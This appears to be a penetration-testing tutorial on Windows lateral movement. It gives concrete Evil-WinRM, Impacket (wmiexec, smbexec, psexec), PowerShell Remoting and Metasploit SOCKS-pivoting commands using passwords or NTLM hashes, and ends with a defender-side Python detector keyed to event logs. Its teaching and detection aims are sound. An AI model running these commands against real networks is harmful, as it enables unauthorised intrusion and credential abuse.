Windows Lateral Movement for Pentesters
When you’ve compromised one machine in an Active Directory environment, the next logical step is to move laterally — hopping from system to system using valid credentials or tokens. In this post, we’ll focus purely on lateral movement techniques and the tools that help make it happen.
We’ll cover:
- Core concepts of lateral movement
- Key tools: Evil-WinRM, WMIExec, SMBExec, PSExec, PowerShell Remoting, RioGeorge
- Pivoting techniques with SOCKS proxies and Metasploit
What Is Lateral Movement?
Lateral movement refers to the technique of moving from one compromised host to another within a network. It’s all about using the access you’ve gained to reach other systems — ideally ones with more privileges or sensitive data.
Unlike privilege escalation, this isn’t about going up — it’s about going sideways. Same domain, different box.
Prerequisites for Lateral Movement
- Valid domain or local credentials (username + password or NTLM hash)
- Target host must allow remote management (e.g., WinRM, SMB, WMI, RDP)
- Necessary ports must be open (e.g., 445, 5985, 135, 3389)
Tools for Windows Lateral Movement
Here’s a breakdown of the key tools you should know:
1. Evil-WinRM
The go-to tool for remote shell access over WinRM.
```bash
evil-winrm -i 10.10.10.10 -u administrator -p 'Password123'
```
You can also authenticate with an NTLM hash instead of a password. Note that `-H` takes only the NT half of the usual LM:NT pair:
```bash
evil-winrm -i 10.10.10.10 -u administrator -H '31d6cfe0d16ae931b73c59d7e0c089c0'
```
Requirements:
- Port 5985 or 5986 (WinRM)
- Remote host must have WinRM enabled
- Admin rights required on the target
2. WMIExec.py (Impacket)
Executes commands via WMI and returns output line by line.
```bash
python3 wmiexec.py administrator:'Password123'@10.10.10.10
```
With a hash:
```bash
python3 wmiexec.py 'domain/administrator@10.10.10.10' -hashes aad3b435b51404eeaad3b435b51404ee:hashhere
```
Quieter than SMBExec because it installs no service, but not silent: each command spawns a process under the WMI provider host and, by default, output is written to a file on the ADMIN$ share, both of which can be logged. Requires admin privileges.
3. SMBExec.py (Impacket)
Executes commands via SMB (like WMIExec, but uses services).
```bash
python3 smbexec.py domain/administrator:Password123@10.10.10.10
```
More invasive than WMIExec since it drops a service.
4. PSExec.py (Impacket)
Remote command execution using SMB and the admin shares.
```bash
python3 psexec.py administrator:Password123@10.10.10.10
```
Or with a hash:
```bash
python3 psexec.py -hashes :NTLMHASH administrator@10.10.10.10
```
Requires write access to ADMIN$ and admin privileges on the target.
5. PowerShell Remoting (Enter-PSSession / Invoke-Command)
Enable remoting on the target (this runs locally on that host; skip it if WinRM is already enabled):
```powershell
Enable-PSRemoting -Force
```
Connect to the remote host with an interactive session:
```powershell
Enter-PSSession -ComputerName 10.10.10.10 -Credential (Get-Credential)
```
Run a single command remotely:
```powershell
Invoke-Command -ComputerName 10.10.10.10 -ScriptBlock { whoami } -Credential (Get-Credential)
```
Port 5985/5986 must be open. Requires WinRM to be enabled and firewall configured.
6. RioGeorge (C# lateral movement toolkit)
RioGeorge is a stealthier tool designed for red team lateral movement using different techniques (WMI, DCOM, etc.) via C# payloads.
- Supports various execution methods (WMI, PSRemoting, DCOM)
- Good for OPSEC-sensitive operations
- Can be used in C2 frameworks or manually compiled for execution
Sample use case: compile it and use it with a valid token or credential to execute a command remotely without dropping binaries to disk.
Note: You’ll need to build this from source or use precompiled binaries. It’s often used in mature red team setups.
Pivoting with SOCKS and Metasploit
If you can’t reach a host directly but can reach it from another compromised box, it’s time to pivot.
Use autoroute and SOCKS in Metasploit
- From your Meterpreter session, add a route for the target subnet:
```
run autoroute -s 10.10.20.0/24
```
- Start a SOCKS proxy in Metasploit:
```
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
```
- Add the proxy to /etc/proxychains4.conf. The keyword must match the module's VERSION option: the module defaults to SOCKS5, so use `socks5` unless you set VERSION to 4a, in which case use `socks4` as shown here:
```
socks4 127.0.0.1 1080
```
- Now run tools like smbclient, wmiexec.py, or crackmapexec through ProxyChains:
```bash
proxychains4 python3 wmiexec.py administrator@10.10.20.5
```
Summary of Tools and When to Use Them
| Tool | Protocol | Use Case |
|---|---|---|
| Evil-WinRM | WinRM | Remote shell with credentials/hash |
| WMIExec.py | WMI (DCOM) | Lightweight, command-by-command exec |
| SMBExec.py | SMB | Executes commands via services |
| PSExec.py | SMB | Admin share access, stable shell |
| PowerShell Remoting | WinRM | Remote PS command execution |
| RioGeorge | C# based | Stealthy red team ops, native calls |
| ProxyChains + Metasploit | All | Pivot into unreachable subnets |
Final Thoughts
Mastering lateral movement is essential in any Windows network pentest. Each environment is different — some hosts might have WinRM open, others might restrict SMB, some might log WMI heavily. Choose your tool based on what ports are open, what level of stealth you need, and what creds you’ve got in hand.
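From the defender's side, each tool family above leaves a distinct host artefact: psexec.py and smbexec.py install a service (System log event 7045), wmiexec.py spawns its commands as children of the WMI provider host (WmiPrvSE.exe), and WinRM/PowerShell Remoting runs them under wsmprovhost.exe, usually preceded by a network (type 3) logon (event 4624). The Python below is an added example, not code from the original post; it classifies constructed event records (the field names are illustrative, not a real log schema) into the technique they suggest and attaches the most recent network logon on that host as the likely source.

```python
# Added example, not part of the original post: classify constructed Windows
# event records into the lateral-movement technique whose artefacts they match.
REMOTE_PARENTS = {               # parent process -> technique it indicates
    "wmiprvse.exe": "WMI exec (wmiexec-style)",
    "wsmprovhost.exe": "WinRM / PowerShell Remoting",
}

# Constructed sample records (field names are illustrative, not a real schema).
RECORDS = [
    {"event_id": 4624, "host": "WS01", "logon_type": 3,
     "user": "administrator", "src_ip": "10.10.10.5"},            # network logon
    {"event_id": 7045, "host": "WS01", "service_name": "BTOBTO",
     "image_path": "%SYSTEMROOT%\\svc.exe"},                       # service install
    {"event_id": 4688, "host": "WS01", "parent": "WmiPrvSE.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /Q /c whoami"},       # WMI child
    {"event_id": 4688, "host": "WS01", "parent": "wsmprovhost.exe",
     "image": "powershell.exe", "cmdline": "whoami"},              # WinRM child
    {"event_id": 4688, "host": "WS01", "parent": "explorer.exe",
     "image": "notepad.exe", "cmdline": "notepad.exe"},            # benign
]

def classify(rec):
    """Return the technique a single record suggests, or None if benign."""
    if rec["event_id"] == 7045:
        # psexec.py / smbexec.py install a service to run their commands
        return "remote service install (psexec/smbexec-style)"
    if rec["event_id"] == 4688:
        return REMOTE_PARENTS.get(rec.get("parent", "").lower())
    return None

def detect(records):
    """Walk records in order; remember the last type-3 (network) logon per host
    so each execution alert carries the likely source IP and account."""
    last_net_logon, alerts = {}, []
    for rec in records:
        if rec["event_id"] == 4624 and rec.get("logon_type") == 3:
            last_net_logon[rec["host"]] = rec
            continue
        technique = classify(rec)
        if technique:
            logon = last_net_logon.get(rec["host"], {})
            alerts.append({"host": rec["host"], "technique": technique,
                           "src_ip": logon.get("src_ip"), "user": logon.get("user"),
                           "detail": rec.get("cmdline") or rec.get("image_path")})
    return alerts

if __name__ == "__main__":
    for alert in detect(RECORDS):
        print(alert)
```

On the sample data this yields three alerts (service install, WMI child, WinRM child), all attributed to the type-3 logon from 10.10.10.5; the notepad.exe record produces none.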
